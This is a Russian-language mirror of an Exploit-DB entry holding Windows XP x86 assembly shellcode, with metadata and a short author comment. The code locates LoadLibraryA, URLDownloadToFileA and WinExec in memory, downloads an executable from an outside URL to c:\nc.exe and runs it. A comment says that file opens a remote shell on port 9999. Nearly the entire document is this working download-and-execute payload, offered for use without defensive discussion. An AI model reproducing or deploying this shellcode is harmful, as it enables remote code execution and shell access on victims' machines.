- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13530
- Проверка EDB
-
- Пройдено
- Автор
- PETER WINTER-SMITH
- Тип уязвимости
- SHELLCODE
- Платформа
- WINDOWS_X86
- CVE
- N/A
- Дата публикации
- 2004-09-26
Код:
; Nice theorhetically generic url download and execute
; shellcode for Windows XP.
;
; Heck, atleast it saves you using tftp!
;
; [email protected]
;
; nasmw -s -fbin -o download.s download.asm
bits 32
start:
jmp short avoidnastynulls
continue:
pop edi ; edi = 'urlmon.dll'
mov esi, edi
mov al, 0ffh
repne scasb
inc byte [edi-01h] ; edi = string of url
mov ebx, edi
mov al, 0ffh
repne scasb
inc byte [edi-01h] ; edi = path of download
mov edx, edi
repne scasb
inc byte [edi-01h]
push edx
push ebx
push edx
push esi
mov ebx, 0c25b5effh
mov ecx, 0deadc0deh
mov edi, 77e60101h
trawlmem:
inc edi
mov al, 0ffh
repne scasb
jmp short checkbytes
nop
checkbytes:
dec edi
push dword [edi]
pop esi
cmp ebx, esi
je short gotcha
jmp short trawlmem
jmp short pastpoint
avoidnastynulls:
jmp short data
pastpoint:
gotcha:
lea eax, [edi-2eh] ; get to start of loadlibrarya function
call eax ; call loadlibrarya
pop edx
pop ebx
push edx
xor ecx, ecx
push ecx
push ecx
push edx ; path of download
push ebx ; url of download
push ecx
mov ebx, 8d8d5602h
mov ecx, 0badc0dedh
mov edi, eax ; eax = base of urlmon.dll
trawlmem2:
inc edi
mov al, 002h
repne scasb
jmp short checkbytes2
nop
checkbytes2:
dec edi
push dword [edi]
pop esi
cmp ebx, esi
je short gotcha2
jmp short trawlmem2
gotcha2:
lea eax, [edi-1bh] ; get to start of urldownloadtofilea function
call eax ; call urldownloadtofilea
pop edx
xor ecx, ecx
;inc ecx
push ecx
push edx
mov ebx, 0c458b66h
mov ecx, 1337f00dh
mov edi, 77e60101h
trawlmem3:
inc edi
mov al, 066h
repne scasb
jmp short checkbytes3
nop
checkbytes3:
dec edi
push dword [edi]
pop esi
cmp ebx, esi
je short gotcha3
jmp short trawlmem3
gotcha3:
lea eax, [edi-16h] ; get to start of winexec function
call eax ; call winexec
mov ecx, 0deadc0deh
infloop: ; infinite loop; no crash when done
inc ecx
cmp ecx, 0badc0dedh
loopnz infloop ; if this slows you down too much, remove it!
int 3h
data:
call continue
db 'URLMON.DLL', 0ffh
db 'http://www.elitehaven.net/ncat.exe', 0ffh ; the file at this address spawns remote shell on port 9999
db 'c:\nc.exe', 0ffh
; milw0rm.com [2004-09-26]- Источник
- www.exploit-db.com
